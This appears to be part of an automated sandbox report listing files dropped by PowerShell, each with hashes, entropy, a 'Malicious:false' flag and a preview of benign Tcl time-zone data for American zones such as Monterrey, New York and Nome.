                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Monterrey) {.. {-9223372036854775808 -24076 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2936
                                                                                                                                                                                                                              Entropy (8bit):3.6410670126139046
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JgQkS4SaEcSyS0sZSUS2kSVSXSulSASX5kAXJMsCXrUari3akaWCa3M+lafpI6L:X5kH4c9GT0E01jm5keJMRXrUEi3akaWO
                                                                                                                                                                                                                              MD5:D78DEBC7C0B15B31635DDC34C49248BC
                                                                                                                                                                                                                              SHA1:DB2FF76DB3A79BE52E2DFD4C7B8B6592946772F9
                                                                                                                                                                                                                              SHA-256:214F97A3BCB2378CCE23D280EA6A3B691604F82E383628F666BE585BB8494932
                                                                                                                                                                                                                              SHA-512:E5FCD0B54F61910E70B1D0EE9911C5B4AFF850F16B651A01D69A63A97880913B0BAB99B0D864C4E613594734FA72CCA0E9607B1ADB6E75957C790990114FD0A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Montevideo) {.. {-9223372036854775808 -13491 0 LMT}.. {-1942690509 -13491 0 MMT}.. {-1567455309 -14400 0 -04}.. {-1459627200 -10800 0 -0330}.. {-1443819600 -12600 0 -0330}.. {-1428006600 -10800 1 -0330}.. {-1412283600 -12600 0 -0330}.. {-1396470600 -10800 1 -0330}.. {-1380747600 -12600 0 -0330}.. {-1141590600 -10800 1 -0330}.. {-1128286800 -12600 0 -0330}.. {-1110141000 -10800 1 -0330}.. {-1096837200 -12600 0 -0330}.. {-1078691400 -10800 1 -0330}.. {-1065387600 -12600 0 -0330}.. {-1047241800 -10800 1 -0330}.. {-1033938000 -12600 0 -0330}.. {-1015187400 -10800 1 -0330}.. {-1002488400 -12600 0 -0330}.. {-983737800 -10800 1 -0330}.. {-971038800 -12600 0 -0330}.. {-954707400 -10800 1 -0330}.. {-938984400 -12600 0 -0330}.. {-920838600 -10800 1 -0330}.. {-907534800 -12600 0 -0330}.. {-896819400 -10800 1 -0330}.. {-853621200 -9000 0 -03}.. {-84
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.748877320903638
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEzQ21h4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/290zQgp
                                                                                                                                                                                                                              MD5:9130CD86BD6417DB877BF9D8F3080CE1
                                                                                                                                                                                                                              SHA1:76C37982C37FE54ED539AC14B5A513817E42937C
                                                                                                                                                                                                                              SHA-256:97F48948EF5108FE1F42D548EA47C88D4B51BF1896EE92634C7ED55555B06DBD
                                                                                                                                                                                                                              SHA-512:EE036350AF95414392BD93DFF528F67D9A93EB192A30056ECBC3D2396AB4B2938B3C096C3EC2BC739294D4C4B7261C427B0AAEB9559F5381CB7F375892781820
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Montreal) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.878534808314885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zQ1HK90ppv:MByMYbpwt290zQ490b
                                                                                                                                                                                                                              MD5:CB5988A2508285B42C2BD487B8F9D6E1
                                                                                                                                                                                                                              SHA1:EAD740A566245B682CE5E284D389DFAE66DF05D9
                                                                                                                                                                                                                              SHA-256:6C3EE46983A3DAA91C9ADF4B18D6B4B80F1505B0057569B66D5B465D4C09B9C1
                                                                                                                                                                                                                              SHA-512:48796213A67F0E3BC56B54CE4D8BE098E74BA5808C9A1082D9381CB729ADFA2ACB9CE9E39A3244B3901405761C97AEE28D44C3BF7239ECC71175C62E152029C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Montserrat) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.785765433607229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwEzEeIAcGu:SlSWB9vsM3y7RQtHAIgpRQPN/290xzEf
                                                                                                                                                                                                                              MD5:F7DAD684104D917E0F29F6951EA627AC
                                                                                                                                                                                                                              SHA1:E57B5CA730D90C5865CF32FEC4872F71E033D21C
                                                                                                                                                                                                                              SHA-256:A889810B8BB42CD206D8F8961164AD03CCFBB1924D583075489F78AFA10EAF67
                                                                                                                                                                                                                              SHA-512:8284F2A357A32B2F5A211904F65E3B5C37B77C9BF38C85DFA0A95A73457F3076EC12F09BC767B4D0B8FC86BF69D01A17A7BF685BAB72F3E519A397D050DA0C3B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nassau) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11373
                                                                                                                                                                                                                              Entropy (8bit):3.8110553140357086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HeohzORhK1a8phYvNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:+uORhK1a8phYloSItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:385C3BDD3E41E5E75CEF0658322B5CDE
                                                                                                                                                                                                                              SHA1:0334C21C8316ED2EE16FC98B1E8867D5E0916C00
                                                                                                                                                                                                                              SHA-256:7BA7DA179AA7DF26AC25E7ACCD9BD83784174445285A0D9CCBD7D6A9AA34F4BC
                                                                                                                                                                                                                              SHA-512:764B680FB8414B5AC8FB110247C19B1004A4453DD2BAC94BF3CFD80281FF3679A5B1D212238509165E022269503ED14A54B0EF73AF7014344752E6A627657D1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/New_York) {.. {-9223372036854775808 -17762 0 LMT}.. {-2717650800 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-1577905200 -18000 0 EST}.. {-1570381200 -14400 1 EDT}.. {-1551636000 -18000 0 EST}.. {-1536512400 -14400 1 EDT}.. {-1523210400 -18000 0 EST}.. {-1504458000 -14400 1 EDT}.. {-1491760800 -18000 0 EST}.. {-1473008400 -14400 1 EDT}.. {-1459706400 -18000 0 EST}.. {-1441558800 -14400 1 EDT}.. {-1428256800 -18000 0 EST}.. {-1410109200 -14400 1 EDT}.. {-1396807200 -18000 0 EST}.. {-1378659600 -14400 1 EDT}.. {-1365357600 -18000 0 EST}.. {-1347210000 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-123895440
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.799414617322291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwMueh4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/2905u+p
                                                                                                                                                                                                                              MD5:B01CC44E5139066F87ADFF16728B98BF
                                                                                                                                                                                                                              SHA1:4464E187AFF336C9137094308C270BB822974DF1
                                                                                                                                                                                                                              SHA-256:55C37BF1A579A22A790ADE6585CE95BEC02DA356E84D2EF7832C422A4484FF9D
                                                                                                                                                                                                                              SHA-512:A45166FFE444982593CBAC3E683D25D9EDB070DB6CD059A83D1C52099F409FFBFE6EA68D255AD000AF142BF8C8D100271531852263677184597877B7BF318847
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nipigon) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8680
                                                                                                                                                                                                                              Entropy (8bit):3.965662913874442
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:OrBvOs5vzC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:OrBvOsM9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:9A5F536932FED5A93E2C3DEB81960CD1
                                                                                                                                                                                                                              SHA1:8E78396D280DD3A9564CEFC7FB722437F3C4D003
                                                                                                                                                                                                                              SHA-256:8E971C9560CCE548B46626D072E62AB0F4C9682BF6A6ABFB4D0E8D63745402FE
                                                                                                                                                                                                                              SHA-512:60CFDBCE87F9CD7F27E071D66B97E60F62E56F413DC867BC809490B30D00045D0757710D6B5724148E2A28BD1E45FB662391820E6350D998002BF67B16776645
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nome) {.. {-9223372036854775808 46702 0 LMT}.. {-3225223727 -39698 0 LMT}.. {-2188947502 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1397
                                                                                                                                                                                                                              Entropy (8bit):3.78056049136398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5TenykFxCFbF3YCFE2FBCFDFr9CFaFPBCFoF2CFTFKCFDuF1CF2F1CFWFhCFGF3a:5quY9EmFYBosNZNW/bWsBzgCccq7JYN9
                                                                                                                                                                                                                              MD5:B4F4530FCE4BF5690042A2DA40413D56
                                                                                                                                                                                                                              SHA1:52D5F2102485F5B326C888A287ED83CA18833BBC
                                                                                                                                                                                                                              SHA-256:9011C76295E6B17CC1973876B497BEE21B9E6562FB25DF66140F811A1FFA9765
                                                                                                                                                                                                                              SHA-512:08CAF75226D190D9FF0AA62AD84B13F1BF9047338A690847DF5B448BDB731A877F3E186298AFD704F4F4E133FF3F3128B098F9D90AE9A8E726AE52F84A7DA2E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Noronha) {.. {-9223372036854775808 -7780 0 LMT}.. {-1767217820 -7200 0 -02}.. {-1206961200 -3600 1 -02}.. {-1191366000 -7200 0 -02}.. {-1175378400 -3600 1 -02}.. {-1159830000 -7200 0 -02}.. {-633823200 -3600 1 -02}.. {-622072800 -7200 0 -02}.. {-602287200 -3600 1 -02}.. {-591836400 -7200 0 -02}.. {-570751200 -3600 1 -02}.. {-560214000 -7200 0 -02}.. {-539128800 -3600 1 -02}.. {-531356400 -7200 0 -02}.. {-191368800 -3600 1 -02}.. {-184201200 -7200 0 -02}.. {-155167200 -3600 1 -02}.. {-150073200 -7200 0 -02}.. {-128901600 -3600 1 -02}.. {-121129200 -7200 0 -02}.. {-99957600 -3600 1 -02}.. {-89593200 -7200 0 -02}.. {-68421600 -3600 1 -02}.. {-57970800 -7200 0 -02}.. {499744800 -3600 1 -02}.. {511232400 -7200 0 -02}.. {530589600 -3600 1 -02}.. {540262800 -7200 0 -02}.. {562125600 -3600 1 -02}.. {571194000 -7200 0 -02}.. {592970400 -
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.8810445182855253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WEktwmGaLV911sF9A604qSScBgN+4ctDzIVQ/c/3hNxTh:WBwDPPA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:10AF9E9461DD03DA4F0AF0595EB36E6C
                                                                                                                                                                                                                              SHA1:57AC9BDE3AC665E49D9D2463A4BFA38C053A4A54
                                                                                                                                                                                                                              SHA-256:D0D8B108453265B60F525A4EC04DE9555087CD6AC5DDBA980B3A96CF0FCD68D1
                                                                                                                                                                                                                              SHA-512:B6DC7D2709A19B911E086C988DB8346F42DBF7601D9E51E3093C6AF897570E43E5F1C101FE88BC5251F3DCC3B532DB22FFE8A12A4D0151BC52AF3E6DDEA7D23A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Beulah) {.. {-9223372036854775808 -24427 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.867423227197841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZEktwmGaLV9tZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:ZBwD6fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:33C03AD65753D7ADB45FC4899B504D1A
                                                                                                                                                                                                                              SHA1:ED719BB67A64DB49901BA38A945A6BA998646B8D
                                                                                                                                                                                                                              SHA-256:ABC2B6C97D9E9FBA37AC582ADBA2CE996890D090060E083405D75CDAED9EABE0
                                                                                                                                                                                                                              SHA-512:69592E8A370C8A5173827500CDDF8190AB44EA87CD7E0C416055CB7958B13A737801EA6B0FFE6032CB3F14F05001BF9DA83E4AEB20F385019B2985ECE7ACB40E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Center) {.. {-9223372036854775808 -24312 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8560
                                                                                                                                                                                                                              Entropy (8bit):3.879452555978431
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GEktwmGaLV9nlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:GBwD2fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:3D3DC12209293086FD843738A4FE87FB
                                                                                                                                                                                                                              SHA1:8103DFA18B5F3F36AF0B53FA350E0F2D300E6289
                                                                                                                                                                                                                              SHA-256:8803FF7C81C933B57178B9D3C502FB4268D9AA594A3C638A7F17AF60B12D300D
                                                                                                                                                                                                                              SHA-512:39BB939780A71B817F82D2B7F56815D33926D150525161051A9950E5A98BA9184670AFC884A1C69D56EADBD6198E3082975448EFBA5FE8A336DB071E6BAB8EF2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/New_Salem) {.. {-9223372036854775808 -24339 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -2160
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7429
                                                                                                                                                                                                                              Entropy (8bit):3.5470060859729253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0ixKXpbzvZ+FxAqe12voJ0euJFNgIHc/QEeF5Z1V8tCSfifK3facfzQWWLQelXuC:0LRJq9LstgV
                                                                                                                                                                                                                              MD5:FC9CEA4B9654D0957F55CB0E1B25A3E7
                                                                                                                                                                                                                              SHA1:8BFC3E8CEC34C4087579D3DA727143E3EC045B77
                                                                                                                                                                                                                              SHA-256:12917DAAA60134BFE56E6979BB27B58A3F295C32BAE02B233E849BCED6B8BCA2
                                                                                                                                                                                                                              SHA-512:355628F2EFF86605653A1EE7D976CE8B3229A4169D35576F6007FABAB37DD280D8F296EE88BECE3D84D3A1C476F23275D1D77CAF157E9A98672CBF14801D7292
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nuuk) {.. {-9223372036854775808 -12416 0 LMT}.. {-1686083584 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -7200 1 -0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2069
                                                                                                                                                                                                                              Entropy (8bit):3.994692300159945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Pe89WU0S+VS+TjV/NF01YluO53ON4Lvf3Pn:5gU033FS1YluOQiLvf3Pn
                                                                                                                                                                                                                              MD5:0CB80C895BB4BFD36043F1CAAFB604B7
                                                                                                                                                                                                                              SHA1:2EC2CA1D31EF1804E4EC26F449CA0D3C4F7AA7A0
                                                                                                                                                                                                                              SHA-256:FC857E4DD0A4AE60A7C56637C752205E20442C7AE62158435BEFCA838174108D
                                                                                                                                                                                                                              SHA-512:4BE44FF49AC588F1B441AB1B2678F5A0F0B60DB5C69F3F45C7447FC5A0175146F9FF83E132A5256CF7E559809EF7394C23DF9156A295D84D3A67EE917E661EED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Ojinaga) {.. {-9223372036854775808 -25060 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -21
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.970379147398626
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGEu5YfMXGm2OHGf8xYoHv5BidhZvFsc1HRX1va0v:SlSWB9eg/290ZDm2OHDxYoHv5GhZd93p
                                                                                                                                                                                                                              MD5:AA408A43079EC8933DE271BE3DA2B502
                                                                                                                                                                                                                              SHA1:421A867DB3FD4779C5F759D0B657D8EB5FB2218B
                                                                                                                                                                                                                              SHA-256:990213DDE00ADCEB74C8D1ECAF81B9C77963E4AB1F35767F7349236FC8E917DF
                                                                                                                                                                                                                              SHA-512:1FB740527555A8E128E05709D05720A249BCBA4B6434D00226C07426E6283AA48973F75268F36E6044F0F0650E012781C8E5519B7EA916C625BBF018B29E9961
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Panama) {.. {-9223372036854775808 -19088 0 LMT}.. {-2524502512 -19176 0 CMT}.. {-1946918424 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.8533019559841972
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:tTqPm4bPJWXtRbALtuO/N0HY2iUmUFLqU:Izod
                                                                                                                                                                                                                              MD5:6BA298F9CEB6406802A01C13313F8EF1
                                                                                                                                                                                                                              SHA1:D77C113CFA927EF65461781FD080F590C8CFCBB9
                                                                                                                                                                                                                              SHA-256:1FB962ECC1E5F02E1001C70460FFF720B114554F9AA7956D6DA154DBEA87B4D7
                                                                                                                                                                                                                              SHA-512:C7F4E2DA503A3167098CFAB7AEC8D75A32D6B081E6777DE7BA3D6B4558D0C44D2CD8A0F1626968295031BABFD2CB96B031B4C00A44F2C554B5B217AE67E69EB4
                                                                                                                                                                                                                              Malicious:false
